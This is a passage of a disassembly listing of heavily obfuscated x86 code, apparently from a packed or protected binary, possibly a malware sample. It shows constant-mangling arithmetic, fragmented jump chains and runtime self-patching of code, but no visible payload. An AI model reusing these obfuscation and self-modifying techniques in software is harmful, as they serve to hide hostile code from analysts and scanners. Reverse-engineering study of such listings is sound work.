		add	ebp, 0DC18A8B4h
		sub	ecx, 0BCA7C1B9h
		jmp	loc_43BA68
; END OF FUNCTION CHUNK	FOR sub_458591
; ---------------------------------------------------------------------------

loc_446C0C:				; CODE XREF: hvvrg7ie:loc_454849j
		jnz	loc_441671
; START	OF FUNCTION CHUNK FOR sub_44EC16

loc_446C12:				; CODE XREF: sub_44EC16+2A7Cj
		jmp	sub_44EC16
; END OF FUNCTION CHUNK	FOR sub_44EC16
; ---------------------------------------------------------------------------

loc_446C17:				; CODE XREF: hvvrg7ie:0043CF9Aj
		jmp	loc_44129D
; ---------------------------------------------------------------------------
		push	edx
		jbe	loc_4569AB
		jmp	loc_441671
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_446C28:				; CODE XREF: sub_43E063:loc_4520CFj
		test	al, al
		jz	loc_45B5B5
		jmp	loc_456688
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C072

loc_446C35:				; CODE XREF: sub_44C072:loc_44899Fj
		pop	ebp
		push	offset byte_454CAB
		jmp	loc_454BE5
; END OF FUNCTION CHUNK	FOR sub_44C072
; ---------------------------------------------------------------------------

locret_446C40:				; CODE XREF: hvvrg7ie:loc_44D4C7j
		retn
; ---------------------------------------------------------------------------

loc_446C41:				; CODE XREF: hvvrg7ie:00445EC2j
		jmp	loc_459F56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_446C46:				; CODE XREF: sub_44B7CB+Fj
		mov	ecx, ds:dword_448D10
		movzx	edx, byte ptr [ecx+edx]
		and	eax, edx
		jz	loc_43C801
		jmp	loc_452909
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_446C5D:				; CODE XREF: sub_44BFF5-434Aj
		shl	eax, 13h

loc_446C60:				; CODE XREF: sub_44BFF5:loc_43CCECj
		add	eax, edx
		xor	eax, ebx
		add	eax, ecx
		xor	eax, esi
		call	sub_44C513

loc_446C6D:				; CODE XREF: sub_459D4C+15j
		jmp	loc_44DED0
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442D68

loc_446C72:				; CODE XREF: sub_442D68+Bj
		jmp	loc_44D1D4
; END OF FUNCTION CHUNK	FOR sub_442D68
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_491. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	57807C40h
		xchg	ecx, [esp]
		mov	eax, ecx
		pop	ecx
		or	eax, 0D6AFADAAh
		xor	eax, 823BEC87h
		add	eax, 78D6F62Dh
		call	sub_450C5A
		jmp	loc_4489A9
; ---------------------------------------------------------------------------
		mov	eax, 7BB3B713h
		jmp	sub_43D247
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_446CA9:				; CODE XREF: sub_44BEBB:loc_45417Dj
		jnz	loc_446052
		jmp	loc_44A789
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------

loc_446CB4:				; CODE XREF: hvvrg7ie:0043CA37j
		xchg	ebx, [esp]
		mov	ebp, ebx
		xchg	ecx, [esp]
		mov	ebx, ecx
		pop	ecx
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_416. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454F91

loc_446CC0:				; CODE XREF: sub_454F91+10j
		jmp	loc_446D08
; END OF FUNCTION CHUNK	FOR sub_454F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_446CC5:				; CODE XREF: sub_445F2A+4C61j
		jbe	loc_447845

loc_446CCB:				; CODE XREF: sub_445F2A:loc_4516CAj
		inc	eax
		mov	[ebp-2Ch], eax
		mov	dword ptr [ebp-20h], 0FFFFFFFFh
; END OF FUNCTION CHUNK	FOR sub_445F2A
; START	OF FUNCTION CHUNK FOR sub_450246

loc_446CD6:				; CODE XREF: sub_450246-EDB8j
		js	loc_43C054
		jmp	loc_44B5EF
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------

loc_446CE1:				; DATA XREF: sub_44F4AE-401Fo
		mov	eax, [esp]
		push	eax
		push	0AB1060DEh
		mov	eax, ebp
		jmp	loc_4500B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_446CF1:				; CODE XREF: sub_45202B-14250j
					; sub_456F9F-14326j
		rol	eax, 15h
		push	eax
		push	ebx
		push	0FDF9E1D9h
		pop	ebx
		add	ebx, 49D5DCD0h
		jmp	loc_45320C
; END OF FUNCTION CHUNK	FOR sub_45202B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_508. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454F91

loc_446D08:				; CODE XREF: sub_454F91:loc_446CC0j
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_454F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443375

loc_446D12:				; CODE XREF: sub_443375+8050j
		jmp	loc_4592A5
; END OF FUNCTION CHUNK	FOR sub_443375
; ---------------------------------------------------------------------------
		jmp	ds:off_41D160
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_446D1D:				; CODE XREF: sub_45A7E8-1525Cj
		jmp	loc_44DBCC
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444F61

loc_446D22:				; CODE XREF: sub_444F61+5j
		jmp	nullsub_540
; END OF FUNCTION CHUNK	FOR sub_444F61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_446D27:				; CODE XREF: sub_43D910:loc_43B4ADj
					; sub_445934:loc_44FC94j ...
		push	offset loc_43CF7C
		jmp	nullsub_279
; END OF FUNCTION CHUNK	FOR sub_445934
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_446D31:				; CODE XREF: sub_439B29+14j
		jnz	loc_459C7C
		jmp	loc_44B9DD
; END OF FUNCTION CHUNK	FOR sub_439B29

; =============== S U B	R O U T	I N E =======================================



sub_446D3C	proc near		; DATA XREF: sub_43D285:loc_45767Fo
		xor	edi, 0B90A97F0h
		add	edi, ebp
		add	edi, 50FE3536h
		call	sub_45A6E4
sub_446D3C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43C811

loc_446D4F:				; CODE XREF: sub_43C811:loc_4529CAj
		jmp	loc_45571C
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------

loc_446D54:				; CODE XREF: hvvrg7ie:0043D5B1j
		jmp	locret_445BC4
; ---------------------------------------------------------------------------

loc_446D59:				; CODE XREF: hvvrg7ie:0045194Bj
		jb	loc_451BC3
		xor	eax, 5116E77Ch
		jmp	loc_44A37C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_446D6A:				; CODE XREF: sub_43D285:loc_43D0D1j
		jnz	loc_4445E7
		jmp	loc_452FF7
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452265

loc_446D75:				; CODE XREF: sub_452265:loc_453400j
		cmp	dword ptr [ebp-8], 0
		jz	loc_44B743
		jmp	loc_45484E
; END OF FUNCTION CHUNK	FOR sub_452265
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_446D84:				; CODE XREF: sub_43D531:loc_44A53Ej
		push	edx
		pop	ebp
		pop	edx
		retn
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_446D88:				; CODE XREF: sub_44388C-A001j
		jmp	loc_43ED59
; END OF FUNCTION CHUNK	FOR sub_44388C

; =============== S U B	R O U T	I N E =======================================



sub_446D8D	proc near		; CODE XREF: sub_43D809:loc_439DD9p
					; sub_43D140+35Bp ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439375 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043A23F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043C177 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C3A2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043CB24 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DCDB SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043E078 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E1A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F4B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F8D8 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00440DDA SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00441875 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00441991 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004427AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442B02 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442F38 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00443574 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443C3E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444572 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004450BD SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004454F2 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00445DD9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004468F5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044724D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448779 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449F04 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044AC54 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044B4AC SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044B661 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BAE0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044CF1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E54D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E745 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045090E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450FCC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00454376 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004548EC SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00454EBD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00455744 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00455D23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456D26 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00458AF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004593B6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004594A7 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0045A2AF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AE1E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045B131 SIZE 00000005 BYTES

		push	ebp
		jmp	loc_44724D
sub_446D8D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466A4

loc_446D93:				; CODE XREF: sub_4466A4:loc_45AB6Ej
		call	sub_4500E7
		push	offset sub_43B36F
		jmp	nullsub_432
; END OF FUNCTION CHUNK	FOR sub_4466A4
; ---------------------------------------------------------------------------
		push	ebx
		push	0F9A63118h
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_446DA8:				; CODE XREF: sub_44B1C6+42BEj
		pop	ebx
		xor	ebx, 0EF3D6FC8h
		or	ebx, 5AB9B791h
		and	ebx, 0B532B27Fh
		xor	ebx, 0B6662C4Ah

loc_446DC1:				; CODE XREF: hvvrg7ie:loc_44F47Dj
		add	ebx, 5DEF42B4h
		jmp	loc_4517DD
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_446DCC:				; CODE XREF: sub_43EB47+C9j
		or	ebp, 4B7E887Bh
		push	ebx
		jmp	loc_44E9A7
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452265

loc_446DD8:				; CODE XREF: hvvrg7ie:00450B21j
					; sub_452265:loc_45484Ej
		jnz	loc_43A82D
		jmp	loc_44E444
; END OF FUNCTION CHUNK	FOR sub_452265
; ---------------------------------------------------------------------------

loc_446DE3:				; CODE XREF: hvvrg7ie:00443EE5j
		jnp	loc_444557
		pushf
		test	esi, 6721C6D1h
		jmp	loc_44BDDA
; ---------------------------------------------------------------------------
		and	esi, edi
		jmp	loc_440D07
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_97. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jge	loc_4472F1
		jmp	loc_45AADB
; ---------------------------------------------------------------------------

loc_446E08:				; CODE XREF: hvvrg7ie:004484AEj
		jbe	loc_43B8BE

loc_446E0E:				; CODE XREF: hvvrg7ie:loc_451C64j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_447177
		jmp	loc_440E12
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_446E1F:				; CODE XREF: sub_43D285:loc_43CE0Dj
		mov	ds:dword_4510B0, eax
		mov	ds:byte_451094,	1
		lea	eax, [ebp+var_14]
		call	sub_454F91

loc_446E33:				; CODE XREF: sub_450434-7FECj
		jmp	loc_4444A3
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4571A0

loc_446E38:				; CODE XREF: sub_4571A0:loc_459EEFj
		pop	edx
		xor	eax, 6D492A69h
		add	eax, 17F183CEh
		and	eax, 546DAF12h
		jmp	loc_444755
; END OF FUNCTION CHUNK	FOR sub_4571A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_446E50:				; CODE XREF: sub_453BBD:loc_4525A9j
		jnz	loc_45B365

loc_446E56:				; CODE XREF: sub_45567C+8j
		jmp	loc_449E79
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
		test	ecx, 0C176672Eh
		jmp	loc_44DA46
; ---------------------------------------------------------------------------

loc_446E66:				; DATA XREF: sub_450434:loc_4403F8o
		xchg	edi, [esp]
		push	0FFFFFFFFh
		lea	eax, [ebp-800h]
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		push	eax
		jmp	loc_4485E2
; ---------------------------------------------------------------------------
		mov	eax, 32FE4135h
		push	offset sub_43A2A5
		jmp	loc_450D0B

; =============== S U B	R O U T	I N E =======================================



sub_446E8C	proc near		; DATA XREF: sub_449EB1+3o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DE26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044058C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443D09 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447CF1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004489A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448EA3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453C68 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454DC0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457B6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457CC6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458ABA SIZE 00000008 BYTES

		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp+4+var_4]
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jno	loc_443D09
		sub	al, 99h
		jmp	loc_447CF1
sub_446E8C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_446EA7:				; CODE XREF: hvvrg7ie:loc_449147j
					; sub_43EE33+C818j
		call	sub_4576E4
		push	offset sub_44359D
		jmp	loc_44A43E
; END OF FUNCTION CHUNK	FOR sub_43EE33
; ---------------------------------------------------------------------------

loc_446EB6:				; CODE XREF: hvvrg7ie:loc_43B48Aj
					; hvvrg7ie:0044A5E1j
		jnz	loc_44E30F
		popf
		jmp	loc_44E307

; =============== S U B	R O U T	I N E =======================================



sub_446EC2	proc near		; CODE XREF: hvvrg7ie:00445276j
					; sub_447162:loc_4514CAp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C897 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043DDE6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004407AC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440D27 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044494C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044602F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446BA5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004472A9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004480C9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449694 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044F910 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004529FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004532F8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00457691 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457B65 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_4407AC
sub_446EC2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_446ED4	proc near		; CODE XREF: sub_4527A1:loc_44327Dp
					; hvvrg7ie:0044B2FDj

; FUNCTION CHUNK AT 0043FA63 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		rol	eax, 9
		push	eax
		call	sub_43E7F3
		jmp	loc_43FA63
sub_446ED4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EC3

loc_446EE6:				; CODE XREF: sub_454EC3:loc_43DEE1j
		add	edx, 0FB3DCE38h
		xchg	edx, [esp+0]
		jmp	sub_43A87E
; END OF FUNCTION CHUNK	FOR sub_454EC3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_540. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_446EF5:				; CODE XREF: hvvrg7ie:loc_447F19j
		sub	esi, 5710222Fh
		rol	esi, 10h
		push	offset sub_44CE32
		jmp	loc_447056
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_446F08:				; CODE XREF: sub_4465A6+AA41j
		mov	edx, 0C8081B4Eh
		sbb	edi, ebx

loc_446F0F:				; CODE XREF: sub_4465A6:loc_449C22j
		push	59F30924h
		pop	eax
		and	eax, 6091BBDAh
		jmp	loc_4564EA
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_446F20:				; CODE XREF: hvvrg7ie:0044AA17j
		jb	loc_452F13

; =============== S U B	R O U T	I N E =======================================



sub_446F26	proc near		; CODE XREF: hvvrg7ie:00440B3Fp

; FUNCTION CHUNK AT 0043CB88 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044208D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C241 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DC7D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044E50D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004506CF SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		test	al, al
		jz	loc_43B3A7
		jmp	loc_44C241
sub_446F26	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4418F0

loc_446F37:				; CODE XREF: sub_4418F0-5120j
		adc	ecx, edi
		jmp	loc_4560C6
; END OF FUNCTION CHUNK	FOR sub_4418F0
; ---------------------------------------------------------------------------

loc_446F3E:				; CODE XREF: hvvrg7ie:loc_446FDDj
		sub	al, 99h
		push	3C5153A9h
		pop	edx
		jmp	loc_45848E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_446F4B:				; CODE XREF: sub_451E1C+7422j
		add	eax, 89557A38h
		xchg	eax, [esp+0]
		jmp	sub_457C82
; END OF FUNCTION CHUNK	FOR sub_451E1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518BD

loc_446F59:				; CODE XREF: sub_4518BD:loc_455815j
		lea	eax, [ebp-20h]
		mov	dword ptr [eax], 594C4C4Fh
		push	20AD606Fh
		pop	eax
		jmp	loc_455D1E
; END OF FUNCTION CHUNK	FOR sub_4518BD

; =============== S U B	R O U T	I N E =======================================



sub_446F6D	proc near		; DATA XREF: sub_4475EC:loc_44A276o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043CF4C SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044822A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450041 SIZE 00000005 BYTES

		push	edx
		push	esi
		push	0CCB11DC3h
		pop	esi

loc_446F75:				; CODE XREF: hvvrg7ie:0043ACDFj
		jmp	loc_450041
sub_446F6D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_446F7A:				; CODE XREF: sub_43F227+A15Bj
		shl	edx, 1Eh

loc_446F7D:				; CODE XREF: sub_43F227:loc_449375j
		and	esi, 3AD5E2CCh
		add	esi, 0E7F0D80Bh
		xchg	esi, [esp+0]
		jmp	loc_439119
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_446F91	proc near		; CODE XREF: hvvrg7ie:0043B42Bj
					; sub_45729C:loc_4572B3p

; FUNCTION CHUNK AT 0043BEAF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004409CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C150 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004599D3 SIZE 0000000F BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, 0F8847A2Fh
		push	edi
		jmp	loc_44C150
sub_446F91	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_446FA1:				; CODE XREF: sub_44C6D7+EBE2j
		jz	loc_44CF8D
		add	edi, esi

loc_446FA9:				; CODE XREF: sub_44C6D7:loc_444FDAj
		push	0
		push	0
		push	0FFFFFFFFh
		push	0
		jmp	loc_43AC61
; END OF FUNCTION CHUNK	FOR sub_44C6D7

; =============== S U B	R O U T	I N E =======================================



sub_446FB6	proc near		; DATA XREF: hvvrg7ie:0044E1E6o

; FUNCTION CHUNK AT 004502D6 SIZE 00000005 BYTES

		pop	ebx
		lea	eax, loc_44EA5C
		mov	byte ptr [eax],	0C3h
		jmp	loc_4502D6
sub_446FB6	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_446FC5	proc near		; CODE XREF: sub_40F3FF+8Cp
					; hvvrg7ie:004511CAj
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A531 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C9E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440922 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004511D0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455039 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00457B45 SIZE 00000006 BYTES

		push	eax
		push	0B8D2D22Dh
		pop	eax
		and	eax, 1707438h
		add	eax, 0FFF4C1A2h
		jmp	loc_440922
sub_446FC5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_446FDD:				; DATA XREF: sub_449D75:loc_4460C0o
		jnz	loc_446F3E
		sub	al, 99h
		push	0E61B767Fh
		pop	edx
		xor	edx, 5F37BF41h
		jmp	loc_43D06B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F50

loc_446FF6:				; CODE XREF: sub_451F50-171FEj
		cmp	byte ptr [eax],	0
		jnz	loc_43F3C7
		mov	eax, [ebp-8]
		shl	eax, 3
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		jmp	loc_457867
; ---------------------------------------------------------------------------

loc_447010:				; CODE XREF: sub_451F50:loc_43AD49j
		mov	eax, [ebp-0Ch]
		cmp	byte ptr [eax],	0
		jmp	loc_4577CB
; END OF FUNCTION CHUNK	FOR sub_451F50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BA0

loc_44701B:				; CODE XREF: sub_445BA0:loc_445BA6j
		mov	ds:dword_43CD84, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_445BA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447DF9

loc_447022:				; CODE XREF: sub_43F7AE+8j
					; sub_447DF9+5951j
		rol	eax, 6
		push	edx
		push	eax
		pop	edx
		xchg	edx, [esp+4+var_4]
		jmp	nullsub_107
; END OF FUNCTION CHUNK	FOR sub_447DF9
; ---------------------------------------------------------------------------
		mov	eax, [esi]
		jmp	loc_45110D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_447037:				; CODE XREF: sub_447E56-BBF5j
		xchg	ecx, [esp+4+var_4]
		jmp	sub_458A13
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------
		push	edi
		push	832BCBB8h
		pop	edi
		sub	edi, 6EE604B6h
		jmp	loc_447EA2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_447051:				; CODE XREF: sub_45488E:loc_43BF4Dj
		call	sub_448100

loc_447056:				; CODE XREF: hvvrg7ie:00446F03j
		jmp	nullsub_217
; END OF FUNCTION CHUNK	FOR sub_45488E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B9C9

loc_44705B:				; CODE XREF: hvvrg7ie:loc_449B5Dj
					; sub_43B9C9:loc_44CB75j
		jz	loc_454299
		jmp	loc_4494B4
; END OF FUNCTION CHUNK	FOR sub_43B9C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44808A

loc_447066:				; CODE XREF: sub_44808A-2F61j
		push	0A5DB0998h
		jmp	loc_450B59
; END OF FUNCTION CHUNK	FOR sub_44808A
; ---------------------------------------------------------------------------

loc_447070:				; CODE XREF: hvvrg7ie:0044A772j
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440195

loc_447074:				; CODE XREF: sub_440195+8j
		jmp	loc_445E73
; END OF FUNCTION CHUNK	FOR sub_440195

; =============== S U B	R O U T	I N E =======================================



sub_447079	proc near		; CODE XREF: sub_43C0DE-15B4p
					; hvvrg7ie:loc_43B667p	...

; FUNCTION CHUNK AT 0044806D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458A9A SIZE 00000005 BYTES

		jns	loc_44806D
		jmp	loc_458A9A
sub_447079	endp


; =============== S U B	R O U T	I N E =======================================



sub_447084	proc near		; DATA XREF: sub_447E56+C7BDo

; FUNCTION CHUNK AT 0044964E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044BE93 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0044C7AA SIZE 00000005 BYTES

		push	edx
		nop
		push	78731B2Bh
		pop	eax
		and	eax, 0F93F4187h
		rol	eax, 1Dh
		jmp	loc_44C7AA
sub_447084	endp

; ---------------------------------------------------------------------------

loc_44709A:				; CODE XREF: hvvrg7ie:loc_4461D2j
		mov	eax, 510AEA73h
		call	sub_43E027
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_4470A4:				; CODE XREF: sub_43E60A+AA6Fj
		jmp	loc_449251
; END OF FUNCTION CHUNK	FOR sub_43E60A

; =============== S U B	R O U T	I N E =======================================



sub_4470A9	proc near		; DATA XREF: sub_456C1B-153ECo

; FUNCTION CHUNK AT 0044ED9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FE67 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457736 SIZE 00000005 BYTES

		add	edx, eax
		rol	edx, 5
		xor	edx, esi
		rol	edx, 5
		add	edx, edi
		jmp	loc_457736
sub_4470A9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF52

loc_4470BA:				; CODE XREF: hvvrg7ie:loc_43D1B3j
					; sub_43AF52:loc_440A14j
		js	loc_44C2F8

loc_4470C0:				; CODE XREF: hvvrg7ie:0044D7B5j
		jmp	loc_43FC0D
; END OF FUNCTION CHUNK	FOR sub_43AF52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_4470C5:				; CODE XREF: sub_45202B-16762j
		jmp	loc_444E84
